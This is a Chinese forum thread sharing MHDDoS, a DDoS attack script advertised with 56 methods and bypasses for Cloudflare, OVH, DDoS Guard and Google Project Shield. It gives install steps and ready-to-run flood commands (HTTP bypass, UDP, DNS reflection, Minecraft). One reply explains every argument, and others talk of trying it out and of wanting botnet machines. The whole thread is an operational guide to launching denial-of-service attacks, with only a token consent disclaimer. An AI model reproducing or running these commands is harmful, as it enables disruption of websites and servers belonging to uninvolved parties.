嘟嘟社区

[不限流量] 【分享】MHDDoS - 有56种方法的DDoS攻击脚本


项目地址:https://github.com/MatrixTM/MHDDoS
作者提示:Please Don’t Attack websites without the owners consent.

——————————————————————
重要特性(详情请查看 readme):
Bypass OVH
Bypass chk_captcha
Send HTTP Packet With High Byte
A New Method With Random SubDomain
Like Google bot
Google Project Shield Bypass
CloudFlare Bypass
DDoS Guard Bypass
CloudFlare Under Attack Mode Bypass
Find Real IP Address Of Websites Powered By Cloudflare
——————————
自动安装
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
——————————-
DockerFile
docker pull ghcr.io/mhprodev/mhddos:latest
———————————
手动安装
python3 -m pip install cfscrape<=2.1.1
python3 -m pip install certifi<=2021.10.8
python3 -m pip install dnspython>=2.2.0
python3 -m pip install requests==2.27.1
python3 -m pip install impacket==0.9.23
python3 -m pip install psutil>=5.9.0
python3 -m pip install icmplib>=2.1.1
python3 -m pip install git+https://github.com/MHProDev/PyRoxy.git
python3 -m pip install yarl~=1.7.2
———————————–
例如:

Layer7 (Website):

# Running bypass attack from 101 threads,
# with socks 5, 100 requests per proxy (connection), for 3600 seconds  
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600

Layer4 (Server/Home):
# Running udp attack from 1 threads, for 3600 seconds  
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds  
# with reflector servers from dns.txt, for 3600 seconds  
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running minecraft attack from 1000 threads
# with socks 5, for 3600 seconds  
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
Debug Mode (Log Attack status):
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true

Tools/Help:
python start.py tools
python start.py help

mk
怎么玩,有教程不~
这就去拿loc试试
我需要的是工具吗?我需要的是肉鸡!

sdqu 发表于 2022-7-8 13:33
我需要的是工具吗?我需要的是肉鸡!

你先这样,然后这样,最后再这样,嗯嗯。

不行吗,不行就D一会重拨

前排mark留作备用
这种脚本网上一找一堆,关键在于要找到能伪造的鸡鸡

stingeo 发表于 2022-7-8 13:30
怎么玩,有教程不~

再解释一下,比方说文档里介绍的第七层
python start.py <1=method> <2=url> <3=socks_type> <4=threads> <5=proxylist> <6=rpc> <7=duration> <8=debug=optional>
1:方法(攻击类型,可填 bypass、bomb等)
2:目标 URL 或 IP 地址
3:代理版本(代理使用,All Proxy填0 HTTP填1 SOCKS4        填4
SOCKS5填5 RANDOM填6)
5:代理文件(代理格式为<Type>://<Host>:<Port>:<User=Optional>:<Password=Optional>,就是<类型>://<目标>:<端口>:<可选:密码,像这样——socks4://1.1.1.1:46527
http://1.1.1.1:443:username:password,然后保存为socks5.txt之类的文件)
4:要使用的线程数(多线程,比如50或100之类)
5:RPC(请求预连接,比如100)
6:持续时间(以秒为单位完成攻击的时间,比如3600)
7:调试模式(可选)
就像这样
python start.py bypass https://example.com 5 101 socks5.txt 100 3600

mark